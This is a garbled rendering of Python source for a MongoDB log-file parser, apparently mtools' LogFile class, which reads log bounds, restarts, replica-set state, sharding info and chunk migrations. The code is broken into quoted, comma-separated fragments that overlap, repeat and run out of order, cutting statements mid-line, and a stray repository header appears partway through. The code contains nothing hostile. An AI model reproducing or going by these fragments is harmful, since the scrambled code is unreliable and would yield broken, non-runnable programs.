0", "able to find a valid log line within max_start_lines max_start_lines", "format\" % self.filehandle.name) # get end datetime (lines are at", "most 10k, # go back 30k at most to make", "os import re import sys from datetime import datetime from", "in LogEvent.log_components): self._has_level = True # find version string (fast", "chunks_moved_to(self): \"\"\"Lazily return the chunks moved to this shard (if", "self._chunks_moved_from = [] self._chunks_moved_to = [] self._chunk_splits = [] prev_line", "\"\"\"Lazy evaluation of the datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds()", "in line: # look for hostname, port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)',", "buff = self.filehandle.read(curr_pos) hr = \"-\" * 60 print(\"Fatal log", "to be forwarded manually, and it will miss the first", "if \"version\" in line[:100]: logevent = LogEvent(line) restart = self._check_for_restart(logevent)", "match.group('errmsg') else: errmsg = \"Unknown\" chunk_migration = (time, chunk_range, moved_to,", "\"<stdin>\" self._bounds_calculated = False self._start = None self._end = None", "tokens[-1] in self.states: rs_state = tokens[-1] else: # 2.6 if", "in line: logevent = LogEvent(line) match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' '", "match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg = match.group('errmsg')", "need to be forwarded manually, and it will miss the", "hr), file=sys.stderr) raise SystemExit(\"Cannot parse %s with requested options\" %", "csrs_info else: match = re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match:", "self._end @property def timezone(self): \"\"\"Lazy evaluation of timezone of logfile.\"\"\"", "\"\"\" For 3.2 the \"[initandlisten] options:\" no longer contains the", "not self._datetime_format: self._calculate_bounds() return self._datetime_format @property def has_level(self): \"\"\"Lazy evaluation", "\"[initandlisten] options:\" long entry contained the \"engine\" field if WiredTiger", "end of file return None def _find_sharding_info(self): \"\"\" Iterate over", "\" 'in namespace (?P<namespace>\\S+)' ' :: caused by :: (?P<error>\\S+):", "if not self._num_lines: self._iterate_lines() return self._repl_set_version @property def repl_set_protocol(self): \"\"\"Return", "if match: self._repl_set_protocol = match.group('replSetProtocol') match = re.search('members: (?P<replSetMembers>[^]]+ ])',", "None self._end = None self._filesize = None self._num_lines = None", "name.\"\"\" if not self._num_lines: self._iterate_lines() return self._binary @property def hostname(self):", "re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: shard_info = (match.group('shardName'), match.group('replSetMembers'))", "and \"db version v\" in logevent.line_str): self._binary = 'mongod' elif", "not self._num_lines: self._iterate_lines() return self._repl_set_members @property def repl_set_version(self): \"\"\"Return the", "over LogFile object. Return a LogEvent object for each line", "or v != versions[-1]: versions.append(v) return versions @property def repl_set(self):", "else: self._year_rollover = False # reset logfile self.filehandle.seek(0) self._bounds_calculated =", "print_function import os import re import sys from datetime import", "the CSRS (if available)\"\"\" if not self._csrs: self._find_sharding_info() return self._csrs", "self._filesize @property def datetime_format(self): \"\"\"Lazy evaluation of the datetime format.\"\"\"", "self.binary == \"mongod\": logevent = LogEvent(line) if \"New replica set", "if \"Finding the split vector for\" in line: logevent =", "namespace, numSplits, success, time_taken, error)) elif \"jumbo\" in line: logevent", "def _check_for_restart(self, logevent): if (logevent.thread == 'initandlisten' and \"db version", "\"\"\" self._shards = [] self._chunks_moved_from = [] self._chunks_moved_to = []", "0 # get start datetime for line in self.filehandle: logevent", "shards(self): \"\"\"Lazily return the shards (if available)\"\"\" if not self._shards:", "re.search('replSet: \"(?P<replSet>\\S+)\"', line) if match: self._repl_set = match.group('replSet') match =", "= re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: if self._csrs and", "bytes): line = line.decode('utf-8', 'replace') if line == '': raise", "return the shards (if available)\"\"\" if not self._shards: self._find_sharding_info() return", "note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the split vector for\" in", "@property def restarts(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not", "match.group('numSplits') success = None time_taken = 0 error = None", "\"\"\" Fast-forward file to given start_dt datetime obj using binary", "chunks moved from this shard (if available)\"\"\" if not self._chunks_moved_from:", "if there was a roll-over, subtract 1 year from start", "and find last newline char jump_back = min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back,", "self._num_lines: self._iterate_lines() return self._num_lines @property def restarts(self): \"\"\"Lazy evaluation of", "command: { replSetInitiate:\" in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\",", "and match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') )) elif not", "and hint datetime format.\"\"\" # use readline here because next()", "self.filehandle.seek(0) def _check_for_restart(self, logevent): if (logevent.thread == 'initandlisten' and \"db", "to find moved from shard name when SERVER-45770 TICKET is", ">= start_dt: self.filehandle.seek(0) return le = None self.filehandle.seek(0) # search", "file stream or stdin.\"\"\" self.filehandle = filehandle self.name = filehandle.name", "note = match.group('note') if note == \"success\": errmsg = None", "\\[(?P<range>.*)\\)', prev_line) if match: time = logevent.datetime split_range = match.group(\"range\")", "self._has_level is None: self._iterate_lines() return self._has_level @property def year_rollover(self): \"\"\"Lazy", "line) else: match = re.search(':: caused by :: (?P<errmsg>\\S+):', prev_line)", "are calculated before starting to iterate, # including potential year", "evaluation of start and end of logfile. Returns None for", "= 'mongos' else: return False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if", "split_range, namespace, numSplits, success, time_taken, error)) prev_line = line #", "self._datetime_format = le.datetime_format self._datetime_nextpos = le._datetime_nextpos return le def __iter__(self):", "class LogFile(InputSource): \"\"\"Log file wrapper class. Handles open file streams", "file.\"\"\" return self.num_lines def _iterate_lines(self): \"\"\"Count number of lines (can", "\"\"\" Iterate over file and find any sharding related information", "replica set monitor for\" in line: if \"[mongosMain]\" in line:", "chunk_range, moved_from, namespace, steps, note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the", "try: logevent = self.next() while not logevent.datetime: logevent = self.next()", "logevent.datetime split_range = None namespace = match.group(\"namespace\") numSplits = match.group('numSplits')", "moved to this shard (if available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info()", "[] self._chunk_splits = [] prev_line = \"\" for line in", "elif self.binary == \"mongod\": logevent = LogEvent(line) if \"New replica", "repl_set(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines()", "namespace = match.group('namespace') # TODO: alter this to find moved", "csrs(self): \"\"\"Lazily return the CSRS (if available)\"\"\" if not self._csrs:", "self.filesize step_size = max_mark # check if start_dt is already", "self._csrs = None self._chunks_moved_from = None self._chunks_moved_to = None self._chunk_splits", "MMAPv1 and WiredTiger \"\"\" if \"[initandlisten] options:\" in line: match", "(?P<stepTimes>\\d+)', line) else: match = re.search(':: caused by :: (?P<errmsg>\\S+):',", "\"\"\" Lazy evaluation of the number of lines. Returns None", "if match: shard_info = (match.group('shardName'), match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary ==", "= re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: match =", "match.group('replSetMembers')) self._shards.append(shard_info) elif self.binary == \"mongod\": logevent = LogEvent(line) if", "logevent._datetime_nextpos break if lines_checked > max_start_lines: break # sanity check", "match.group('engine') else: self._storage_engine = 'mmapv1' \"\"\" For 3.2 the \"[initandlisten]", "back 15k characters (at most) and find last newline char", "from this shard (if available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info() return", "== \"<stdin>\" self._bounds_calculated = False self._start = None self._end =", "walk backwards until we found a truly smaller line while", "evaluation of the whether the logfile has any level lines.\"\"\"", "filesize(self): \"\"\" Lazy evaluation of start and end of logfile.", "None self._timezone = None self._hostname = None self._port = None", "new_config = (\"New replica set config in use: \") if", "pos = 2 else: pos = 6 rs_state = '", "self._rs_state.append(state) continue if \"[rsMgr] replSet\" in line: tokens = line.split()", "for\" in line: logevent = LogEvent(line) match = re.search('for (?P<namespace>\\S+).*'", "= 0 success = False time_taken = 0 error =", "for each line (generator). \"\"\" le = None while True:", "if \"[rsMgr] replSet\" in line: tokens = line.split() if self._hostname:", "self._shards = None self._csrs = None self._chunks_moved_from = None self._chunks_moved_to", "\"(?P<note>\\S+)\"', line) if match: time = logevent.datetime chunk_range = match.group('range')", "time_taken, error)) elif \"splitVector\" in line: logevent = LogEvent(line) match", "= self.filehandle.read(curr_pos) hr = \"-\" * 60 print(\"Fatal log parsing", "\"\"\"Return the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return", "def repl_set_members(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines:", "for lifetime of a Logfile object return if self.from_stdin: return", "replica set config in use\" in line: if \"configsvr: true\"", "whether the logfile has any level lines.\"\"\" if self._has_level is", "try: le = self.next() except StopIteration as e: # end", "None self._chunks_moved_to = None self._chunk_splits = None # Track previous", "or stdin.\"\"\" self.filehandle = filehandle self.name = filehandle.name self.from_stdin =", "line[28:31].strip() in LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components): self._has_level = True", ":: caused by :: (?P<error>\\S+): ', line) if match: time", "if match: self._repl_set_members = match.group('replSetMembers') # if (\"is now in", "None self._chunk_splits = None # Track previous file position for", "evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._restarts", "self._num_lines: self._iterate_lines() return self._binary @property def hostname(self): \"\"\"Lazy evaluation of", "import datetime from math import ceil from mtools.util.input_source import InputSource", "attempting to find end date if (self._start is None): raise", "engine if available.\"\"\" if not self._num_lines: self._iterate_lines() return self._storage_engine @property", "is None: self._calculate_bounds() return self._year_rollover @property def num_lines(self): \"\"\" Lazy", "error = None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))", "and end of logfile. Returns None for stdin input currently.", "None # Track previous file position for loop detection in", "evaluation of the datetime format.\"\"\" if self._year_rollover is None: self._calculate_bounds()", "else: pos = 5 host = tokens[pos] rs_state = tokens[-1]", "match.group('replSetMembers') )) elif not self._csrs: self._csrs = ( match.group('replSet'), match.group('replSetMembers')", "# buffer so seek position is wrong line = self.filehandle.readline()", "datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds() return self._datetime_format @property def", "if not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property def chunks_moved_from(self): \"\"\"Lazily", "get end date if not self.end and self.from_stdin: if le", "logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break if lines_checked", "self._port @property def versions(self): \"\"\"Return all version changes.\"\"\" versions =", "= logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace') moved_to =", "the whether the logfile has any level lines.\"\"\" if self._has_level", "= re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname = match.group('host') self._port =", "= re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line) if match:", "now tell us definitively that wiredTiger is being used \"\"\"", "fast_forward(self, start_dt): \"\"\" Fast-forward file to given start_dt datetime obj", "of \\d): (?P<stepTimes>\\d+)', line) else: match = re.search(':: caused by", "# skip lines until start_dt is reached return else: #", "self._num_lines = 0 self._restarts = [] self._rs_state = [] ln", "= tokens[-1] else: # 2.6 if tokens[1].endswith(']'): pos = 2", "re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname = match.group('host') self._port = match.group('port')", "port match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname = match.group('host')", "reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\" Fast-forward file to", "])', line) if match: self._repl_set = match.group('replSet') self._repl_set_members = match.group('replSetMembers')", "format.\"\"\" if not self._datetime_format: self._calculate_bounds() return self._datetime_format @property def has_level(self):", "(?P<replSetProtocol>\\d+), ', line) if match: self._repl_set_protocol = match.group('replSetProtocol') match =", "newline_pos = buff.rfind('\\n') if prev: newline_pos = buff[:newline_pos].rfind('\\n') # move", "\"\"\"Log file wrapper class. Handles open file streams or stdin.\"\"\"", "{ (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if match: time =", "1], hr), file=sys.stderr) raise SystemExit(\"Cannot parse %s with requested options\"", "1, 1) # roll forward until we found a line", "to iterate, # including potential year rollovers self._calculate_bounds() @property def", "while self.filehandle.tell() >= 2 and (le.datetime is None or le.datetime", "field if WiredTiger was the storage engine. There were only", "logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*'", "', line) if match: self._repl_set_protocol = match.group('replSetProtocol') match = re.search('members:", "self.filehandle.read(curr_pos) hr = \"-\" * 60 print(\"Fatal log parsing loop", "to auto-split chunk\" in line: logevent = LogEvent(line) match =", "1) le = self._find_curr_line() if not le: break if le.datetime", "seek position. \"\"\" curr_pos = self.filehandle.tell() # jump back 15k", "line with a datetime try: logevent = self.next() while not", "config:\" which was present in 3.0, but would now tell", "5 host = tokens[pos] rs_state = tokens[-1] state = (host,", "self.name, hr, buff[:error_context], buff[error_context:error_context + 1], hr), file=sys.stderr) raise SystemExit(\"Cannot", "(if available)\"\"\" if not self._csrs: self._find_sharding_info() return self._csrs @property def", "@property def repl_set(self): \"\"\"Return the replSet (if available).\"\"\" if not", "in line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match:", "hint info from another logevent self._datetime_format = le.datetime_format self._datetime_nextpos =", "in state\" in line and # next(state for state in", "line near offset %s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing", "self._start: self._calculate_bounds() return self._start @property def end(self): \"\"\" Lazy evaluation", "hint info self._datetime_format = None self._datetime_nextpos = None elif le.datetime:", "self._storage_engine = 'mmapv1' \"\"\" For 3.2 the \"[initandlisten] options:\" no", "self._start = logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format = logevent.datetime_format self._datetime_nextpos", "self._datetime_nextpos, self.year_rollover) if not ret: # logevent indicates timestamp format", "of timezone of logfile.\"\"\" if not self._timezone: self._calculate_bounds() return self._timezone", "chunk_splits(self): \"\"\"Lazily return the chunks split in this shard (if", "None for stdin input currently. \"\"\" if self.from_stdin: return None", "line) if match: time = logevent.datetime split_range = None namespace", "None self._port = None self._rs_state = None self._repl_set = None", "in line: match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+", "\"\"\" Internal helper function. Find the current (or previous if", "match = re.search('port=(?P<port>\\d+).*host=(?P<host>\\S+)', line) if match: self._hostname = match.group('host') self._port", "this to find moved from shard name when SERVER-45770 TICKET", "if not self._num_lines: self._iterate_lines() return self._repl_set_members @property def repl_set_version(self): \"\"\"Return", "repl_set_protocol(self): \"\"\"Return the replSet protocolVersion (if available).\"\"\" if not self._num_lines:", "= match.group('replSet') match = re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine", "split_range, namespace, numSplits, success, time_taken, error)) elif \"Unable to auto-split", "re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line) if match: self._repl_set_protocol = match.group('replSetProtocol')", "line: self._storage_engine = 'wiredTiger' if \"command admin.$cmd command: { replSetInitiate:\"", "self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"moveChunk.from\" in line:", "%s with requested options\" % self.filehandle.name) else: self.prev_pos = curr_pos", "= line.split() # 2.6 if tokens[1].endswith(']'): pos = 4 else:", "if (self._has_level is None and line[28:31].strip() in LogEvent.log_levels and line[31:39].strip()", "try: yield le except StopIteration: return states = (['PRIMARY', 'SECONDARY',", "= re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'version: (?P<replSetVersion>\\d+), ', line) if", "open file stream or stdin.\"\"\" self.filehandle = filehandle self.name =", "max_start_lines = 10 lines_checked = 0 # get start datetime", "line == '': raise StopIteration line = line.rstrip('\\n') le =", "= ceil(step_size / 2.) self.filehandle.seek(step_size, 1) le = self._find_curr_line() if", "buffer so seek position is wrong line = self.filehandle.readline() if", "# TODO: alter this to find moved from shard name", "logfile as open file stream or stdin.\"\"\" self.filehandle = filehandle", "# now walk backwards until we found a truly smaller", "self.start and self.from_stdin: if le and le.datetime: self._start = le.datetime", "of logfile.\"\"\" if not self._timezone: self._calculate_bounds() return self._timezone @property def", "\"command admin.$cmd command: { replSetInitiate:\" in line: match = re.search('{", "def chunks_moved_to(self): \"\"\"Lazily return the chunks moved to this shard", "= re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg = match.group('errmsg') chunk_migration", "input currently. \"\"\" if self.from_stdin: return None if not self._num_lines:", "= logevent._datetime_nextpos break if lines_checked > max_start_lines: break # sanity", "1) self._year_rollover = self._end else: self._year_rollover = False # reset", "\"[initandlisten] options:\" no longer contains the \"engine\" field So now", "self._hostname + ':' + self._port else: host = os.path.basename(self.name) host", "match.group(\"time_taken\") numSplits = 0 success = True error = None", "import print_function import os import re import sys from datetime", "self._storage_engine @property def shards(self): \"\"\"Lazily return the shards (if available)\"\"\"", "\" \"log line near offset %s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current", "= match.group('numSplits') success = None time_taken = 0 error =", "= self._hostname + ':' + self._port else: host = os.path.basename(self.name)", "= None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg", "available)\"\"\" if not self._csrs: self._find_sharding_info() return self._csrs @property def chunks_moved_to(self):", "None: self._iterate_lines() return self._has_level @property def year_rollover(self): \"\"\"Lazy evaluation of", "self._repl_set = match.group('replSet') self._repl_set_members = match.group('replSetMembers') # Replica set config", "(host, rs_state, LogEvent(line)) self._rs_state.append(state) continue self._num_lines = ln + 1", "a valid log line within max_start_lines max_start_lines = 10 lines_checked", "return self._hostname @property def port(self): \"\"\"Lazy evaluation of the binary", "if prev=True) line in a log file based on the", "# go back 30k at most to make sure we", "= \"-\" * 60 print(\"Fatal log parsing loop detected trying", "3.0 the \"[initandlisten] options:\" long entry contained the \"engine\" field", "line or \"starting:\" in line: # look for hostname, port", "+= ' (self)' if tokens[-1] in self.states: rs_state = tokens[-1]", "elif not self._csrs: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if", "numSplits = 0 success = True error = None self._chunk_splits.append((time,", "\"starting :\" in line or \"starting:\" in line: # look", "self._find_curr_line() if not le: break if le.datetime >= start_dt: step_size", "lines until start_dt is reached return else: # fast bisection", "self._start: self._start = self._start.replace(year=self._start.year - 1) self._year_rollover = self._end else:", "(curr_pos, self.name, hr, buff[:error_context], buff[error_context:error_context + 1], hr), file=sys.stderr) raise", "# next(state for state in states if line.endswith(state))): if \"is", "_find_curr_line(self, prev=False): \"\"\" Internal helper function. Find the current (or", "match = re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine = match.group('engine')", "that would otherwise match (as it consumes the log line).", "elif \"Unable to auto-split chunk\" in line: logevent = LogEvent(line)", "in logevent.line_str): self._binary = 'mongod' elif logevent.thread == 'mongosMain' and", "self._chunks_moved_to @property def chunks_moved_from(self): \"\"\"Lazily return the chunks moved from", "config in use: \") if new_config in line: match =", "for loop detection in _find_curr_line() self.prev_pos = None self._has_level =", "self._calculate_bounds() return self._timezone @property def filesize(self): \"\"\" Lazy evaluation of", "0 error = match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken,", "if len(versions) == 0 or v != versions[-1]: versions.append(v) return", "line) if match: time = logevent.datetime chunk_range = match.group('range') namespace", "the shards (if available)\"\"\" if not self._shards: self._find_sharding_info() return self._shards", "\"\"\" For 3.0 the \"[initandlisten] options:\" long entry contained the", "(?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set = match.group('replSet') self._repl_set_members =", "# return (instead of raising StopIteration exception) per PEP 479", "= match.group('replSetVersion') match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line) if", "None self._chunks_moved_from = None self._chunks_moved_to = None self._chunk_splits = None", "re.search(':: caused by :: (?P<errmsg>\\S+):', prev_line) steps = None if", "protocolVersion: (?P<replSetProtocol>\\d+), ', line) if match: self._repl_set_protocol = match.group('replSetProtocol') match", "le.datetime try: yield le except StopIteration: return states = (['PRIMARY',", "which was present in 3.0, but would now tell us", "if line.endswith(state))): if \"is now in state\" in line: tokens", "find end date if (self._start is None): raise SystemExit(\"Error: <%s>", "is wrong line = self.filehandle.readline() if isinstance(line, bytes): line =", "from mtools.util.input_source import InputSource from mtools.util.logevent import LogEvent class LogFile(InputSource):", "if self._has_level is None: self._iterate_lines() return self._has_level @property def year_rollover(self):", "= LogEvent(line) # hint format and nextpos from previous line", "ceil(step_size / 2.) self.filehandle.seek(step_size, 1) le = self._find_curr_line() if not", "config in use\" in line: if \"configsvr: true\" in line:", "bound while abs(step_size) > 100: step_size = ceil(step_size / 2.)", "evaluation of the datetime format.\"\"\" if not self._datetime_format: self._calculate_bounds() return", "self._num_lines: self._iterate_lines() return self._repl_set @property def repl_set_members(self): \"\"\"Return the replSet", "we should be able to find a valid log line", "start_dt): \"\"\" Fast-forward file to given start_dt datetime obj using", "\"\" for line in self.filehandle: if isinstance(line, bytes): line =", "= LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"',", "LogEvent(line) match = re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match:", "start(self): \"\"\" Lazy evaluation of start and end of logfile.", "find a valid log line within max_start_lines max_start_lines = 10", "input currently. \"\"\" if not self._start: self._calculate_bounds() return self._start @property", "the chunks split in this shard (if available)\"\"\" if not", "def datetime_format(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if not", "restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._restarts @property def rs_state(self):", "self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage engine if available.\"\"\" if", "\"jumbo\" in line: logevent = LogEvent(line) match = re.search('migration (?P<namespace>\\S+):", "return False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version: version =", "match: self._repl_set = match.group('replSet') self._repl_set_members = match.group('replSetMembers') # Replica set", "= None self._port = None self._rs_state = None self._repl_set =", "le = self._find_curr_line() if not le: break if le.datetime >=", "<gh_stars>0 #!/usr/bin/env python3 from __future__ import print_function import os import", "= logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace') # TODO:", "Returns None for stdin input currently. \"\"\" if self.from_stdin: return", "to last newline char if newline_pos == -1: self.filehandle.seek(0) return", "-abs(step_size) else: step_size = abs(step_size) if not le: return #", "longer contains the \"engine\" field So now we have to", "sanity check before attempting to find end date if (self._start", "- jump_back + 1, 1) # roll forward until we", "def port(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not", "logfile. Returns None for stdin input currently. \"\"\" if not", "= self.next() while not logevent.datetime: logevent = self.next() return logevent", "\"\"\" le = None while True: try: le = self.next()", "split_range, namespace, numSplits, success, time_taken, error)) elif \"splitVector\" in line:", "re.search('members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set_members = match.group('replSetMembers') #", "get end datetime (lines are at most 10k, # go", "\"Finding the split vector for\" in line: logevent = LogEvent(line)", "found a line with a datetime try: logevent = self.next()", "self._find_sharding_info() return self._shards @property def csrs(self): \"\"\"Lazily return the CSRS", "jump back 15k characters (at most) and find last newline", "\\d): (?P<stepTimes>\\d+)', line) else: steps = None match = re.search('errmsg:", "'mmapv1' \"\"\" For 3.2 the \"[initandlisten] options:\" no longer contains", "'version: (?P<replSetVersion>\\d+), ', line) if match: self._repl_set = match.group('replSet') self._repl_set_version", "not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily return", "a log file based on the current seek position. \"\"\"", "10k, # go back 30k at most to make sure", "LogEvent class LogFile(InputSource): \"\"\"Log file wrapper class. Handles open file", "else: step_size = abs(step_size) if not le: return # now", "line: logevent = LogEvent(line) match = re.search(\"chunk \\[(?P<range>.*)\\) \" 'in", "= None namespace = match.group(\"namespace\") numSplits = match.group('numSplits') success =", "self.from_stdin: self.filehandle.seek(0) # return (instead of raising StopIteration exception) per", "storage_engine(self): \"\"\"Return storage engine if available.\"\"\" if not self._num_lines: self._iterate_lines()", "set config in use\" in line: if \"configsvr: true\" in", "logfile self.filehandle.seek(0) def _check_for_restart(self, logevent): if (logevent.thread == 'initandlisten' and", "False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str) if version: version = version.group(1)", "self._rs_state = [] ln = 0 for ln, line in", "match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg (?P<time_taken>\\d+)', line) if", "== curr_pos: # Number of characters to show before/after the", "jump_back + 1, 1) # roll forward until we found", "# check if start_dt is already smaller than first datetime", "(if available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def", "return else: # fast bisection path max_mark = self.filesize step_size", "'': raise StopIteration line = line.rstrip('\\n') le = LogEvent(line) #", "based on the current seek position. \"\"\" curr_pos = self.filehandle.tell()", "None and self.prev_pos == curr_pos: # Number of characters to", "self._repl_set_version = match.group('replSetVersion') match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ', line)", "60 print(\"Fatal log parsing loop detected trying to find previous", "re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)', line) if match: time = logevent.datetime", "raising StopIteration exception) per PEP 479 return # get start", "split in this shard (if available)\"\"\" if not self._chunk_splits: self._find_sharding_info()", "host = self._hostname + ':' + self._port else: host =", "logevent = LogEvent(line) lines_checked += 1 if logevent.datetime: self._start =", "open file streams or stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide logfile", "@property def year_rollover(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if", "evaluation of timezone of logfile.\"\"\" if not self._timezone: self._calculate_bounds() return", "for stdin input currently. \"\"\" if not self._end: self._calculate_bounds() return", "restart: self._restarts.append((restart, logevent)) if \"starting :\" in line or \"starting:\"", "for\" in line: match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if", "line: match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: if", "namespace, steps, note, errmsg) self._chunks_moved_from.append(chunk_migration) if \"moveChunk.to\" in line: logevent", "def end(self): \"\"\" Lazy evaluation of start and end of", "(self._start is None): raise SystemExit(\"Error: <%s> does not appear to", "None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error)) elif \"splitVector\"", "(?P<replSetVersion>\\d+), ', line) if match: self._repl_set = match.group('replSet') self._repl_set_version =", "not self._num_lines: self._iterate_lines() return self._hostname @property def port(self): \"\"\"Lazy evaluation", "(fast check to eliminate most lines) if \"version\" in line[:100]:", "line if self._datetime_format and self._datetime_nextpos is not None: ret =", "match.group('replSetMembers') # Replica set config logging in MongoDB 3.0+ new_config", "= self.next() return logevent except StopIteration: # reached end of", "return True def _find_curr_line(self, prev=False): \"\"\" Internal helper function. Find", "\"\"\"Lazy evaluation of the binary name.\"\"\" if not self._num_lines: self._iterate_lines()", "(if available)\"\"\" if not self._chunks_moved_to: self._find_sharding_info() return self._chunks_moved_to @property def", "of the binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._port", "if (logevent.thread == 'initandlisten' and \"db version v\" in logevent.line_str):", "in enumerate(self.filehandle): if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if", "has changed, # invalidate hint info self._datetime_format = None self._datetime_nextpos", "= re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match: time = logevent.datetime", "or stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide logfile as open file", "in logevent.line_str): self._binary = 'mongos' else: return False version =", "options\" % self.filehandle.name) else: self.prev_pos = curr_pos if isinstance(buff, bytes):", "the replSet protocolVersion (if available).\"\"\" if not self._num_lines: self._iterate_lines() return", "lines.\"\"\" if self._has_level is None: self._iterate_lines() return self._has_level @property def", "split_range = match.group(\"range\") namespace = match.group(\"namespace\") numSplits = 0 success", "log file, get end date if not self.end and self.from_stdin:", "le = self.next() except StopIteration as e: # end of", "re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if match: time", "self._year_rollover @property def num_lines(self): \"\"\" Lazy evaluation of the number", "self.from_stdin: return None if not self._num_lines: self._iterate_lines() return self._num_lines @property", "logevent indicates timestamp format has changed, # invalidate hint info", "prev_line = line # reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt):", "def storage_engine(self): \"\"\"Return storage engine if available.\"\"\" if not self._num_lines:", "= None self._datetime_format = None self._year_rollover = None self._shards =", "= (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr] replSet\" in", "namespace = match.group(\"namespace\") numSplits = 0 success = False time_taken", "state\" in line: tokens = line.split() # 2.6 if tokens[1].endswith(']'):", "use\" in line: if \"configsvr: true\" in line: match =", "is added moved_from = \"Unknown\" note = match.group('note') if note", "states = (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER',", "lines_checked += 1 if logevent.datetime: self._start = logevent.datetime self._timezone =", "re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else: match = re.search('::", "= logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") time_taken =", "SystemExit(\"Error: <%s> does not appear to be a supported \"", "self._rs_state = None self._repl_set = None self._repl_set_members = None self._repl_set_version", "has_level(self): \"\"\"Lazy evaluation of the whether the logfile has any", "StopIteration as e: # end of log file, get end", "1 # reset logfile self.filehandle.seek(0) def _check_for_restart(self, logevent): if (logevent.thread", "elif logevent.thread == 'mongosMain' and ('MongoS' in logevent.line_str or 